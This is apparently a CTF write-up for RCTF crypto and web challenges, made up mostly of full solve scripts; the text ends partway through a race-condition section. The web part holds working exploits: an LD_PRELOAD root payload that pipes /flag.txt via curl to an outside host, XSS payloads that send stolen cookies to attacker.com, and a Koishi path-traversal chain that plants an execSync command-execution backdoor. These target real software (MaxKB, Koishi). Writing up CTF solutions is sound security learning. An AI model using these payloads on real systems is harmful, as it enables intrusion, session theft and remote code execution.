Online link: https://hackmd.io/hXUVjghXSP26eFX6b_8RYA
[TOC]
# Crypto
## SuanHash
Gemini deepthink
```py
from pwn import *
# Configuration
HOST = '1.14.196.78'
PORT = 42103
ROUNDS = 500
Mask64 = (1 << 64) - 1
# Set log level
context.log_level = 'info'
def bytes_to_int(b):
return int.from_bytes(b, 'big')
def int_to_bytes(i, length=16):
try:
return i.to_bytes(length, 'big')
except OverflowError:
log.error(f"Integer {hex(i)} too large for {length} bytes.")
raise
def split_hash(h_hex):
"""Splits a 128-bit hex hash string into 64-bit high and low integers."""
h = int(h_hex, 16)
h_hi = h >> 64
h_lo = h & Mask64
return h_hi, h_lo
def solve():
try:
# Increase timeout as the 500 rounds take time
io = remote(HOST, PORT, timeout=60)
except Exception as e:
log.error(f"Failed to connect to {HOST}:{PORT}: {e}")
return
log.info(f"Connected. Starting the challenge...")
# --- Pre-computation ---
# 1. Define initial probing messages M_A, M_B (15 bytes)
M_A = b"\x00" * 15
M_B = b"\x01" * 15
M_A_hex = M_A.hex().encode()
M_B_hex = M_B.hex().encode()
# 2. Padded blocks B_A, B_B
B_A = M_A + b"\x80"
B_B = M_B + b"\x80"
# 3. Pre-calculate Delta_B_lo = B_A_lo ^ B_B_lo (64 bits).
B_A_int = bytes_to_int(B_A)
B_B_int = bytes_to_int(B_B)
B_A_lo = B_A_int & Mask64
B_B_lo = B_B_int & Mask64
Delta_B_lo_XOR = B_A_lo ^ B_B_lo
# 4. Define the first extension block B1_ext (Zero block).
B1_ext = b"\x00" * 16
try:
# Skip the banner
io.recvuntil(f"Survive {ROUNDS} rounds to get the flag!\n".encode())
for rnd in range(1, ROUNDS + 1):
print(rnd)
# Wait for the round prompt
io.recvuntil(f"[Round {rnd}]".encode())
# --- Phase 1: Calculate Delta_S (Queries 1 and 2) ---
# Query 1: M_A
io.sendlineafter(b"MSG 1 (hex): ", M_A_hex)
io.recvuntil(b"H = ")
H_A_hex = io.recvline().strip()
H_A_hi, H_A_lo = split_hash(H_A_hex)
# Query 2: M_B
io.sendlineafter(b"MSG 2 (hex): ", M_B_hex)
io.recvuntil(b"H = ")
H_B_hex = io.recvline().strip()
H_B_hi, H_B_lo = split_hash(H_B_hex)
# Calculate Delta_S
Delta_S_hi = H_A_hi ^ H_B_hi
# Delta_S_lo = H_A_lo ^ H_B_lo ^ Delta_B_lo
Delta_S_lo = H_A_lo ^ H_B_lo ^ Delta_B_lo_XOR
Delta_S = (Delta_S_hi << 64) | Delta_S_lo
# The second extension block B2_ext = Delta_S
B2_ext = int_to_bytes(Delta_S, 16)
# --- Phase 2: Construct Collision (Queries 3 and 4) ---
# M1 = B_A || B1_ext (32 bytes)
M1 = B_A + B1_ext
# M2 = B_B || B2_ext (32 bytes)
M2 = B_B + B2_ext
M1_hex = M1.hex().encode()
M2_hex = M2.hex().encode()
# Query 3: M1
io.sendlineafter(b"MSG 3 (hex): ", M1_hex)
io.recvuntil(b"H = ")
H_M1_hex = io.recvline().strip()
# Query 4: M2
io.sendlineafter(b"MSG 4 (hex): ", M2_hex)
io.recvuntil(b"H = ")
H_M2_hex = io.recvline().strip()
# Verification (Sanity Check)
if H_M1_hex != H_M2_hex:
log.error(f"Failed at round {rnd}. Hashes do not match locally! Attack failed.")
break
# Check the response from the server
response = io.readline()
if b"Hash collision found!" not in response:
log.error(f"Failed at round {rnd}. Server did not confirm collision.")
log.error(f"Server response: {response.decode(errors='ignore')}")
break
# Log progress
if rnd % 50 == 0 or rnd == ROUNDS:
log.success(f"Completed round {rnd}/{ROUNDS}")
else:
# If the loop completes successfully
log.success("[+] Survived all rounds! Retrieving the flag...")
# Read the flag
flag_prefix = b"Nice! Here is your flag: "
try:
# Ensure we read until the flag prefix if it wasn't in the last response
if flag_prefix not in response:
io.recvuntil(flag_prefix, timeout=10)
flag = io.recvline().strip().decode()
log.success(f"[+] Flag: {flag}")
except Exception as e:
log.error(f"Did not receive the flag: {e}")
except EOFError:
log.error("[-] Connection closed unexpectedly.")
except Exception as e:
log.error(f"[-] An error occurred: {e}")
finally:
if 'io' in locals() and io:
io.close()
if __name__ == "__main__":
solve()
```
```python=
[+] Completed round 500/500
[+] [+] Survived all rounds! Retrieving the flag...
[+] [+] Flag: RCTF{my_sponge_is_toooooooo_soft_cdb801e6adbd}
[*] Closed connection to 1.14.196.78 port 42103
ctf/rctf/suanhash via 🐍 v3.13.5 took 25m18s
```
Flag: `RCTF{my_sponge_is_toooooooo_soft_cdb801e6adbd}`
## SuanP01y
Gemini deepthink
```py
import sys
import os
import time
from hashlib import md5
# Import necessary libraries
try:
# Import specific components to ensure we are using Sage's versions
from sage.all import GF, PolynomialRing, gcd, ZZ
from Crypto.Cipher import AES
except ImportError:
print("Error: Dependencies missing.")
print("This script requires SageMath and pycryptodome.")
print("Please run it using 'sage solve.py'.")
print("Install pycryptodome using: sage -pip install pycryptodome")
sys.exit(1)
# Define parameters based on the challenge script
r, d = 16381, 41
B = r // 3 # Degree bound B = 5460
# Setup the rings exactly as in the challenge script.
# This is crucial so that str(h0) matches for the key derivation.
try:
R.<x> = PolynomialRing(GF(2))
S.<X> = R.quo(x**r - 1)
except Exception as e:
print(f"Error setting up SageMath environment: {e}")
print("Please ensure you are running this script with 'sage solve.py'.")
sys.exit(1)
modulus = x**r - 1
def parse_output(filename="output.txt"):
"""Reads output.txt and parses the hint polynomial and the ciphertext."""
if not os.path.exists(filename):
print(f"Error: {filename} not found.")
sys.exit(1)
with open(filename, "r") as f:
lines = f.readlines()
if len(lines) < 2:
print("Error: Invalid output.txt format.")
sys.exit(1)
hint_str = lines[0].strip().replace("hint = ", "")
ciphertext_hex = lines[1].strip()
# Parse the hint polynomial.
# Robust parsing: Use a temporary ring with 'X' to parse the string,
# then convert the coefficient list to the target ring S.
try:
# Define a parser ring with variable 'X'
R_parser = PolynomialRing(GF(2), 'X')
H_parsed = R_parser(hint_str)
# Convert the parsed polynomial to the quotient ring S
H = S(H_parsed.list())
except Exception as e:
print(f"Error parsing polynomial: {e}")
# Fallback attempt
try:
hint_R = R(hint_str.replace('X', 'x'))
H = S(hint_R)
except Exception as e2:
print(f"Fallback parsing failed: {e2}")
sys.exit(1)
return H, ciphertext_hex
def rational_reconstruction(G_poly, M, B, d):
"""
Performs Rational Reconstruction using the Extended Euclidean Algorithm (EEA).
Finds (t1, t0) such that t1/t0 = G_poly mod M, with deg(t1)<=B, deg(t0)<=B,
and Hamming weights equal to d.
Returns (t1, t0) on success, or (None, None) on failure.
"""
# Initialize EEA on (M, G_poly) over R=GF(2)[x]
r0, r1 = M, G_poly
u0, u1 = R(0), R(1) # Multipliers u_i (representing the denominator)
# Run EEA until the degree of the remainder r1 (numerator) is <= B
while r1.degree() > B:
if r1 == 0:
# Reached the end of EEA, no solution found within bounds yet.
return None, None
try:
# Calculate quotient
q = r0 // r1
except ArithmeticError:
return None, None
# Update remainders and multipliers. In GF(2), subtraction is addition (+).
r0, r1 = r1, r0 + q * r1
u0, u1 = u1, u0 + q * u1
# Check if the solution satisfies the remaining constraints
# Check degree bound for the denominator u1
if u1.degree() <= B:
t1, t0 = r1, u1
# Check sparsity constraints (Hamming weight)
if t0.hamming_weight() == d and t1.hamming_weight() == d:
# Check gcd condition (required by the challenge generation)
if gcd(t0, t1) == 1:
return t1, t0
return None, None
def decrypt_flag(t0, ciphertext_hex):
"""Attempts decryption by iterating over all possible rotations s0."""
print("Attempting decryption by iterating over s0...")
try:
ciphertext = bytes.fromhex(ciphertext_hex)
except ValueError:
print("Error: Ciphertext is not a valid hex string.")
return False
# We found t0. The actual secret h0 is t0 * X^s0 for some unknown s0.
# Optimize rotation by updating h0 iteratively (h0 *= X)
h0 = S(t0)
# Iterate over all possible rotations s0
for s0 in range(r):
# Calculate AES key: md5(str(h0)).
key_str = str(h0)
key = md5(key_str.encode()).digest()
try:
cipher = AES.new(key=key, nonce=b"suanp01y", mode=AES.MODE_CTR)
plaintext = cipher.decrypt(ciphertext)
# Check for known flag prefix
if plaintext.startswith(b"RCTF{"):
print(f"\nFlag found! s0 = {s0}")
print(f"Flag: {plaintext.decode()}")
return True
except Exception:
pass
if s0 > 0 and s0 % 2000 == 0:
print(f"Tried {s0}/{r} rotations...", end='\r', flush=True)
# Rotate for the next iteration: h0 = h0 * X
h0 *= X
print("\nDecryption failed for this candidate t0.")
return False
def solve():
"""Main solving logic."""
print("Parsing output.txt...")
H, ciphertext_hex = parse_output()
print("Output parsed.")
print(f"Starting search using Rational Reconstruction (EEA)...")
print(f"Parameters: r={r}, d={d}, B={B}")
start_time = time.time()
# We iterate over the relative shift s. G = H * X^(-s) = t1/t0.
# X^(-1) is X^(r-1) in the ring R/(x^r - 1)
X_inv = X**(r-1)
G = H
# Iterate over all possible relative rotations s
for s in range(r):
# Print progress
if s > 0 and s % 100 == 0:
elapsed = time.time() - start_time
# Explicitly cast Sage Integers/Rationals to float()
# to prevent TypeErrors during formatting (e.g., :.2f).
s_float = float(s)
r_float = float(r)
# Calculate ETA
if s_float > 0:
avg_time = elapsed / s_float
eta = (r_float - s_float) * avg_time
percentage = (s_float/r_float) * 100.0
print(f"s = {s}/{r} ({percentage:.2f}%) | Elapsed: {elapsed:.1f}s | ETA: {eta/60.0:.1f} mins", end='\r', flush=True)
# Lift G from the quotient ring S to the polynomial ring R=GF(2)[x] for EEA
G_lifted = G.lift()
# Apply Rational Reconstruction
t1, t0 = rational_reconstruction(G_lifted, modulus, B, d)
# FIX: Check if the reconstruction was successful (t0 and t1 are not None).
if t0 is not None and t1 is not None:
print(f"\nFound candidates for t0, t1 with rotation s = {s}")
# Verification
# 1. Check the relation t1 = G * t0 (mod x^r-1)
if S(t1) != G * S(t0):
print("Verification failed (relation mismatch). False positive.")
G *= X_inv
continue
# 2. Check if t0 is a unit (required by the challenge generation loop).
# An element is a unit in S iff gcd(t0, x^r-1) = 1 in R.
if gcd(t0, modulus) == 1:
print("Verification successful (t0 is invertible)!")
if decrypt_flag(t0, ciphertext_hex):
# Cast time calculation to float for formatting
total_time = float(time.time() - start_time)
print(f"\nTotal time: {total_time/60.0:.2f} mins")
print("Challenge solved!")
return
else:
# This happens when we find a sparse representation, but it corresponds
# to a non-invertible element (a false positive for this specific challenge).
print("Verification failed (t0 is not invertible). Continuing search...")
# Update G for the next iteration: G = G * X^(-1)
G *= X_inv
# Cast time calculation to float for formatting
total_time = float(time.time() - start_time)
print(f"\nTotal time: {total_time/60.0:.2f} mins")
print("Solution not found.")
if __name__ == "__main__":
solve()
```
```py
❯ sage solve.sage
Parsing output.txt...
Output parsed.
Starting search using Rational Reconstruction (EEA)...
Parameters: r=16381, d=41, B=5460
s = 3200/16381 (19.53%) | Elapsed: 77.8s | ETA: 5.3 mins
Found candidates for t0, t1 with rotation s = 3261
Verification successful (t0 is invertible)!
Attempting decryption by iterating over s0...
Tried 12000/16381 rotations...
Flag found! s0 = 12421
Flag: RCTF{i_just_h0pe_ChatGPT_doesnt_inst@ntly_so1ve_thi5_one.}
Total time: 3.71 mins
Challenge solved!
ctf/rctf/SuanP01y via 🐍 v3.13.5 took 3m44s
```
Flag: `RCTF{i_just_h0pe_ChatGPT_doesnt_inst@ntly_so1ve_thi5_one.}`
## RePairing
https://chatgpt.com/share/6918a404-b204-8004-9132-d6245de1f1b5
```python=
#!/usr/bin/env python3
from pwn import *
import os
import subprocess
HOST = "1.14.196.78"
PORT = 42601
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
HELPER_DIR = os.path.join(BASE_DIR, "helper")
HELPER_BIN = os.path.join(HELPER_DIR, "target", "release", "helper")
CARGO_TOML = """[package]
name = "helper"
version = "0.1.0"
edition = "2021"
[dependencies]
ark-bls12-381 = "0.5"
ark-ec = "0.5"
ark-ff = "0.5"
ark-serialize = "0.5"
hex = "0.4"
"""
HELPER_SRC = """use std::io::{self, Read};
use ark_bls12_381::{Bls12_381, G1Affine, G1Projective, G2Affine, G2Projective};
use ark_ec::{CurveGroup, PrimeGroup, pairing::Pairing};
use ark_serialize::{CanonicalDeserialize, CanonicalSerialize};
type GT = <Bls12_381 as Pairing>::TargetField;
// hex / parse helpers
fn hex_g1(p: &G1Projective) -> String {
let a: G1Affine = (*p).into_affine();
let mut v = Vec::new();
a.serialize_compressed(&mut v).unwrap();
hex::encode(v)
}
fn hex_g2(p: &G2Projective) -> String {
let a: G2Affine = (*p).into_affine();
let mut v = Vec::new();
a.serialize_compressed(&mut v).unwrap();
hex::encode(v)
}
fn hex_gt(x: >) -> String {
let mut v = Vec::new();
x.serialize_compressed(&mut v).unwrap();
hex::encode(v)
}
fn parse_g1(s: &str) -> G1Projective {
let b = hex::decode(s).expect("hex g1");
let a = G1Affine::deserialize_compressed(&*b).expect("g1 deser");
G1Projective::from(a)
}
fn parse_g2(s: &str) -> G2Projective {
let b = hex::decode(s).expect("hex g2");
let a = G2Affine::deserialize_compressed(&*b).expect("g2 deser");
G2Projective::from(a)
}
fn parse_gt(s: &str) -> GT {
let b = hex::decode(s).expect("hex gt");
GT::deserialize_compressed(&*b).expect("gt deser")
}
fn main() {
// Read the banner line from stdin
let mut input = String::new();
io::stdin().read_to_string(&mut input).unwrap();
let line = input.trim_end();
let mut parts = line.split('|');
let _id_hex = parts.next().unwrap();
let _dst_hex = parts.next().unwrap();
let pk_hex = parts.next().unwrap();
let h_id_hex = parts.next().unwrap();
let c1_hex = parts.next().unwrap();
let c2_hex = parts.next().unwrap();
let c3_hex = parts.next().unwrap();
let _enc_flag_hex = parts.next().unwrap();
// Parse elements
let pk_gt = parse_gt(pk_hex); // pk.pk in GT
let q = parse_g2(h_id_hex); // h1(id) in G2
let c1 = parse_gt(c1_hex);
let c2 = parse_g1(c2_hex);
let c3 = parse_g2(c3_hex);
// Rerandomization with r = 1:
// C1' = C1 * pk
// C2' = C2 + G1
// C3' = C3 + q
let c1p = c1 * pk_gt;
let c2p = c2 + G1Projective::generator();
let c3p = c3 + q;
println!("{}|{}|{}", hex_gt(&c1p), hex_g1(&c2p), hex_g2(&c3p));
}
"""
def ensure_helper():
os.makedirs(os.path.join(HELPER_DIR, "src"), exist_ok=True)
with open(os.path.join(HELPER_DIR, "Cargo.toml"), "w") as f:
f.write(CARGO_TOML)
with open(os.path.join(HELPER_DIR, "src", "main.rs"), "w") as f:
f.write(HELPER_SRC)
subprocess.check_call(["cargo", "build", "--release"], cwd=HELPER_DIR)
def rerandomize_ct(banner_line: str) -> str:
ensure_helper()
proc = subprocess.Popen(
[HELPER_BIN],
cwd=HELPER_DIR,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
)
out, err = proc.communicate(banner_line + "\n")
if proc.returncode != 0:
raise RuntimeError(f"helper failed:\n{err}")
return out.strip()
def main():
r = remote(HOST, PORT)
# <id_hex>|<dst_hex>|<pk_hex>|<h_id_hex>|<c1_hex>|<c2_hex>|<c3_hex>|<enc_flag_hex>
banner = r.recvline().decode().strip()
ct_prime_line = rerandomize_ct(banner)
r.sendline(ct_prime_line.encode())
key_hex = r.recvline().strip().decode()
parts = banner.split('|')
if len(parts) != 8:
raise ValueError(f"unexpected banner format: {len(parts)} parts")
enc_flag_hex = parts[7]
enc_flag = bytes.fromhex(enc_flag_hex)
key = bytes.fromhex(key_hex)
flag = bytes(a ^ b for a, b in zip(enc_flag, key))
print(flag.decode(errors="ignore"))
if __name__ == "__main__":
main()
```
```py
❯ python solve.py
[+] Opening connection to 1.14.196.78 on port 42601: Done
Compiling helper v0.1.0 (/home/rewhile/code/ctf/rctf/repairing/helper)
Finished `release` profile [optimized] target(s) in 4.30s
RCTF{ElGamal-style_re-randomization_attack_still_break_modern_schemes_7ec932b22988}
[*] Closed connection to 1.14.196.78 port 42601
```
Flag: `RCTF{ElGamal-style_re-randomization_attack_still_break_modern_schemes_7ec932b22988}`
# Web
## RootKB
MaxKB exposes a “Tool Debug” API that runs arbitrary Python inside the application container. The debug executor normally runs as the low-privilege `sandbox` user, but the shared library it loads on every call (`/opt/maxkb-app/sandbox/sandbox.so`) is writable by that same user. By overwriting this .so with an LD_PRELOAD payload, an authenticated admin escalates from the sandbox user to code execution as root when the next debug run loads the library.
```python=
import base64
import sys
import time
from urllib.parse import urljoin
import requests
with open("wrapper_sandbox.so", "rb") as f:
MALICIOUS_SO_B64 = base64.b64encode(f.read()).decode()
SANDBOX_SO_PATH = "/opt/maxkb-app/sandbox/sandbox.so"
SANDBOX_SO_BACKUP_PATH = "/opt/maxkb-app/sandbox/sandbox.so.orig"
USERNAME = "admin"
PASSWORD = "MaxKB@123.."
def build_url(base_url, path):
return urljoin(base_url.rstrip('/') + '/', path.lstrip('/'))
def api_request(session, base_url, method, path, **kwargs):
resp = session.request(method, build_url(base_url, path), timeout=10, **kwargs)
resp.raise_for_status()
data = resp.json()
if data.get("code") != 200:
raise RuntimeError(f"API error on {path}: {data}")
return data["data"]
def run_debug(session, base_url, headers, workspace_id, code):
payload = {
"code": code,
"input_field_list": [],
"debug_field_list": [],
"init_params": {},
}
resp = session.post(
build_url(base_url, f"/admin/api/workspace/{workspace_id}/tool/debug"),
headers={**headers, "Content-Type": "application/json"},
json=payload,
timeout=10,
)
resp.raise_for_status()
data = resp.json()
if data.get("code") != 200:
raise RuntimeError(f"Debug failed: {data}")
return data.get("data")
def read_file_b64(session, base_url, headers, workspace_id, path, attempts=5):
last_err = None
for _ in range(attempts):
try:
code = f"""
def tool(**kwargs):
import base64
with open({path!r}, 'rb') as f:
data = f.read()
return base64.b64encode(data).decode()
"""
return run_debug(session, base_url, headers, workspace_id, code)
except Exception as e:
last_err = e
time.sleep(0.5)
raise last_err
def write_file_from_b64(session, base_url, headers, workspace_id, path, data_b64):
code = f"""
def tool(**kwargs):
import base64, os
data = base64.b64decode({data_b64!r})
with open({path!r}, 'wb') as f:
f.write(data)
os.chmod({path!r}, 0o755)
return "ok"
"""
run_debug(session, base_url, headers, workspace_id, code)
def main():
base_url = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:1337"
session = requests.Session()
print("[+] Logging in", flush=True)
login = api_request(session, base_url, "POST", "/admin/api/user/login",
json={"username": USERNAME, "password": PASSWORD})
token = login["token"]
headers = {"Authorization": f"Bearer {token}"}
print("[+] Fetching workspace list", flush=True)
profile = api_request(session, base_url, "GET", "/admin/api/user/profile", headers=headers)
workspaces = profile.get("workspace_list") or []
if not workspaces:
raise SystemExit("No workspaces available")
workspace_id = workspaces[0]["id"]
print("[+] Backing up original sandbox.so", flush=True)
original_so_b64 = read_file_b64(session, base_url, headers, workspace_id, SANDBOX_SO_PATH)
write_file_from_b64(session, base_url, headers, workspace_id, SANDBOX_SO_BACKUP_PATH, original_so_b64)
print("[+] Writing malicious sandbox.so", flush=True)
write_file_from_b64(session, base_url, headers, workspace_id, SANDBOX_SO_PATH, MALICIOUS_SO_B64)
try:
print("[+] Triggering LD_PRELOAD copy", flush=True)
run_debug(session, base_url, headers, workspace_id, "def tool(**kwargs):\n return 'trigger'")
finally:
print("[+] Restoring original sandbox.so", flush=True)
write_file_from_b64(session, base_url, headers, workspace_id, SANDBOX_SO_PATH, original_so_b64)
if __name__ == "__main__":
main()
```
```c
#define _GNU_SOURCE
#include <dlfcn.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <stdlib.h>
static void trigger(void) {
if (getenv("LD_PAYLOAD_RAN")) return;
setenv("LD_PAYLOAD_RAN", "1", 1);
system("cat /flag.txt | curl -X POST -d @- http://attack/flag_leak");
}
__attribute__((constructor)) static void init(void) {
setuid(0);
setgid(0);
trigger();
dlopen("/opt/maxkb-app/sandbox/sandbox.so.orig", RTLD_NOW | RTLD_GLOBAL);
}
```
## author
The application implements XSS protection using `xss-shield.js`. Specifically, it performs HTML sanitization using `DOMPurify` on the following code:
```javascript
document.getElementById('article-content').innerHTML = article.content;
```
`xss-shield.js` uses `Object.getOwnPropertyDescriptor` to intercept this code execution and sanitizes the content before assigning it to `innerHTML`.
If `xss-shield.js` is not loaded on the page, sanitization will not be executed.
1. During user registration, inject a Content Security Policy (CSP) as an HTML meta tag
2. Use the `script-src-elem` directive in CSP to prevent `xss-shield.js` from loading
3. The XSS payload is assigned directly to `innerHTML` without sanitization
4. When the Bot visits the article, the XSS payload is executed
```python
import requests
import re
import random
URL = "http://101.245.67.126/"
BOT = "http://101.245.67.126:26000/"
EVIL = "http://attacker.com/"
s = requests.session()
r = s.get(f"{URL}register")
csrf = re.findall(r'<meta name="csrf-token" content=([^>]+)>', r.text)[0]
user = {
"username": "'script-src-elem http://blog-app/assets/js/article.js' http-equiv=Content-Security-Policy",
"email": f"{random.randbytes(8).hex()}@a.com",
"password": "password",
"confirm_password": "password"
}
r = s.post(f"{URL}register", data=user, headers={
"x-csrf-token": csrf
})
print(user)
print(r.text)
r = s.post(f"{URL}articles/store", data={
"title": "x",
"subtitle": "x",
"content": f"<img src=X onerror=location.href='{EVIL}'+document.cookie>",
}, headers={
"x-csrf-token": csrf
})
print(r.text)
article_id = r.json()["article_id"]
r = s.post(BOT + "audit", data={
"id": article_id
})
print(r.text)
```
## author_plus
Unlike the previous challenge, `article.content` is now sanitized on the server side, making the previous XSS technique ineffective.
Usernames cannot contain the characters `<>\'"\x20\t\r\n`, significantly limiting direct HTML injection.
HTML treats many characters as whitespace, including the form feed character (`\f`). By separating attributes in the meta tag using `\f`, we can inject multiple attributes without being blocked by the username restrictions
Most DOM event handlers don't work on meta tags. However, according to [this blog](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags), the `onbeforetoggle` event is a notable exception that can be triggered on meta elements
The application implements protection against direct cookie access via `document.cookie`. This requires an alternative method to exfiltrate the session cookie.
This can be bypassed using
```javascript!
Object.getOwnPropertyDescriptor(document.__proto__.__proto__, 'cookie' ).get.apply(document)
```
```python!
import requests
import re
import random
URL = "http://1.95.9.9/"
BOT = "http://1.95.9.9:26000/"
EVIL = "http://attacker.com/"
s = requests.session()
r = s.get(f"{URL}register")
csrf = re.findall(r'<meta name="csrf-token" content=([^>]+)>', r.text)[0]
user = {
"username": f"x\fpopover\fid=aaa\fonbeforetoggle=location.href=`{EVIL}?`+Object.getOwnPropertyDescriptor(document.__proto__.__proto__,`cookie`).get.apply(document)",
"email": f"{random.randbytes(8).hex()}@a.com",
"password": "password",
"confirm_password": "password"
}
r = s.post(f"{URL}register", data=user, headers={
"x-csrf-token": csrf
})
print(user)
print(r.text)
r = s.post(f"{URL}articles/store", data={
"title": "x",
"subtitle": "x",
"content": f"<button id=audit popovertarget=aaa>hi</button><div popover id=aaa>hii</div>",
}, headers={
"x-csrf-token": csrf
})
print(r.text)
article_id = r.json()["article_id"]
r = s.post(BOT + "audit", data={
"id": article_id
})
print(r.text)
```
## photographer
- `User::findById` joins the `photo` table without aliasing, so the `photo.type` column overwrites `user.type` in the fetched row (`app/models/User.php`).
- `Auth::type()` simply returns the merged row’s `type`, meaning it will read the photo’s MIME column after a background is set (`app/middlewares/Auth.php`).
- Photo uploads persist a user-controlled MIME type directly into `photo.type` with no validation (`app/controllers/PhotoController.php`).
- The superadmin gate trusts `Auth::type() < $user_types['admin']` (`public/superadmin.php`), so any negative MIME value grants access.
```python=
import base64
import os
import random
import re
import string
import requests
BASE_URL = "http://localhost:9010"
def rand_user():
suffix = "".join(random.choices(string.ascii_lowercase + string.digits, k=6))
return f"rctf_{suffix}", f"{suffix}@example.com", "Password1!"
def get_csrf_from_html(html):
m = re.search(r'name="csrf_token" value="([^"]+)"', html)
if not m:
m = re.search(r"const csrfToken = '([^']+)'", html)
if not m:
raise RuntimeError("CSRF token not found in page")
return m.group(1)
def main():
sess = requests.Session()
r = sess.get(f"{BASE_URL}/register")
r.raise_for_status()
csrf = get_csrf_from_html(r.text)
username, email, password = rand_user()
reg_data = {
"username": username,
"email": email,
"password": password,
"confirm_password": password,
"csrf_token": csrf,
}
r = sess.post(f"{BASE_URL}/api/register", data=reg_data)
r.raise_for_status()
if not r.json().get("success"):
raise RuntimeError(f"Registration failed: {r.text}")
png_bytes = base64.b64decode(
"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/x8AAusB9YcNTx8AAAAASUVORK5CYII="
)
files = {"photos[]": ("evil.png", png_bytes, "-1")}
r = sess.post(f"{BASE_URL}/api/photos/upload", files=files)
r.raise_for_status()
resp = r.json()
if not resp.get("success"):
raise RuntimeError(f"Upload failed: {resp}")
photo_id = resp["photos"][0]["id"]
r = sess.get(f"{BASE_URL}/space")
r.raise_for_status()
csrf = get_csrf_from_html(r.text)
r = sess.post(
f"{BASE_URL}/api/user/background",
data={"photo_id": photo_id, "csrf_token": csrf},
)
r.raise_for_status()
if not r.json().get("success"):
raise RuntimeError(f"Setting background failed: {r.text}")
r = sess.get(f"{BASE_URL}/superadmin.php")
r.raise_for_status()
print(r.text.strip())
if __name__ == "__main__":
main()
```
## 514's_Heart
- Plugin loader resolves scoped names via a naive concatenation that leaves `..` intact (`node_modules/ns-require/lib/index.js`, initialized by loader at `node_modules/@koishijs/loader/lib/index.js`). A crafted name `@plugin-xxx/../../../../../../koishi/config.yml` traverses out and reads Koishi config.
- The traversed config leaks admin credentials (`koishi-app/koishi/koishi.yml`), enabling authenticated console WebSocket access.
- Authenticated console APIs allow arbitrary plugin write and reload; we drop `hack9.js` that exposes an HTTP route executing `child_process.execSync`
- Triggering the backdoor route (e.g., `/test123?cmd=cat+/flag`) yields command execution as the Koishi service user (root in the challenge container).
- Bug part:
```javascript=
const name = ctx.path.slice(uiPath.length).replace(/^\/+/, "");
const sendFile = /* @__PURE__ */ __name((filename2) => {
ctx.type = (0, import_path.extname)(filename2);
return ctx.body = (0, import_fs.createReadStream)(filename2);
}, "sendFile");
if (name.startsWith("@plugin-")) {
const [key] = name.slice(8).split("/", 1);
if (this.entries[key]) {
const files = (0, import_koishi.makeArray)(this.getFiles(this.entries[key].files));
const filename2 = files[0] + name.slice(8 + key.length);
ctx.type = (0, import_path.extname)(filename2);
if (this.config.devMode || ctx.type !== "application/javascript") {
return sendFile(filename2);
}
const source = await import_fs.promises.readFile(filename2, "utf8");
return ctx.body = await this.transformImport(source);
} else {
return ctx.status = 404;
}
```
PoC
```python=
#!/usr/bin/env python3
import asyncio
import json
import sys
import urllib.parse
import requests
import websockets
import yaml
import textwrap
BASE = "http://localhost:5140/"
_parsed = urllib.parse.urlsplit(BASE)
_hostport = _parsed.netloc or _parsed.path
WS = urllib.parse.urlunsplit((
"wss" if _parsed.scheme == "https" else "ws",
_hostport,
"/status",
"",
"",
))
PAYLOAD_FILE = "hack9.js"
SHELL_ROUTE = "/test123"
async def fetch_entries():
async with websockets.connect(WS, max_size=10_000_000) as ws:
async for raw in ws:
try:
msg = json.loads(raw)
except Exception:
continue
if msg.get("type") == "data" and msg.get("body", {}).get("key") == "entry":
return msg["body"]["value"]
raise RuntimeError("entry data not received")
def payload_js():
# minimal Koishi plugin that exposes /pwn and executes a shell command as root
return textwrap.dedent(
f"""
const {{ execSync }} = require('child_process');
module.exports.name = 'evil';
module.exports.apply = (ctx) => {{
ctx.server.get('{SHELL_ROUTE}', (koa) => {{
try {{
let cmd = koa.query.cmd || 'id';
koa.body = execSync(cmd).toString();
}} catch (e) {{
koa.body = String(e);
}}
}});
}};
"""
)
async def main():
user, pw = "admin", "rctf2025gogogotorce"
print(f"[*] Got admin creds: {user}:{pw}")
print("[*] Opening authenticated WebSocket...")
async with websockets.connect(WS, max_size=10_000_000) as ws:
await ws.send(json.dumps({"type": "login/password", "args": [user, pw], "id": 1}))
while True:
msg = json.loads(await ws.recv())
if msg.get("type") == "response" and msg.get("body", {}).get("id") == 1:
if msg["body"].get("error"):
raise RuntimeError(f"login failed: {msg['body']['error']}")
print("[*] Logged in as admin.")
break
js = payload_js()
await ws.send(json.dumps({
"type": "explorer/write",
"args": [PAYLOAD_FILE, js, False],
"id": 2,
}))
while True:
msg = json.loads(await ws.recv())
# print(msg)
if msg.get("type") == "response" and msg.get("body", {}).get("id") == 2:
if msg["body"].get("error"):
raise RuntimeError(f"write failed: {msg['body']['error']}")
print("[*] Payload written.")
break
await ws.send(json.dumps({
"type": "manager/reload",
"args": ["", "./" + PAYLOAD_FILE, {}],
"id": 3,
}))
while True:
msg = json.loads(await ws.recv())
# print(msg)
if msg.get("type") == "response" and msg.get("body", {}).get("id") == 3:
if msg["body"].get("error"):
raise RuntimeError(f"reload failed: {msg['body']['error']}")
print("[*] Payload plugin loaded.")
break
url = BASE.rstrip('/') + SHELL_ROUTE
print(f"[*] Triggering shell route {url} ...")
r = requests.get(url, timeout=10)
print(f"[*] HTTP {r.status_code}")
print(r.text)
if __name__ == "__main__":
asyncio.run(main())
```
## UltimateFreeloader
The server implements a custom multithread lock system using Redis. In `OrderService.createOrder`, the lock is only valid for 3 seconds, so if the process between the lock acquirement and release takes more than 3 seconds, race conditions may occur.
`quantity` parameter is parsed from string to `BigDecimal` with `new BigDecimal(orderRequest.getQuantity())`. While this value will be forced to be `1` if the value is larger than `100`, sending `1e9999999`, this value will be so big that parsing it to `BigDecimal` takes longer than 3 seconds.
Since the validation of coupon happens before `new BigDecimal(orderRequest.getQuantity())` and `this.couponService.useCoupon(couponId)` happens after, we can exploit a TOCTOU vulnerability and use the coupon twice.
```java
public Map<String, Object> createOrder(String userId, OrderRequestDTO orderRequest) {
Map<String, Object> result = new HashMap<>();
String lockKey = "order:user:" + userId;
String lockValue = this.redisLockUtil.generateLockValue();
/* ... */
try {
/* ... */
String couponId = null;
if (orderRequest.getCouponId() != null) {
if (!this.couponService.validateCoupon(orderRequest.getCouponId(), userId)) {
result.put("success", Boolean.valueOf(false));
result.put("message", "Coupon is not available");
return result;
}
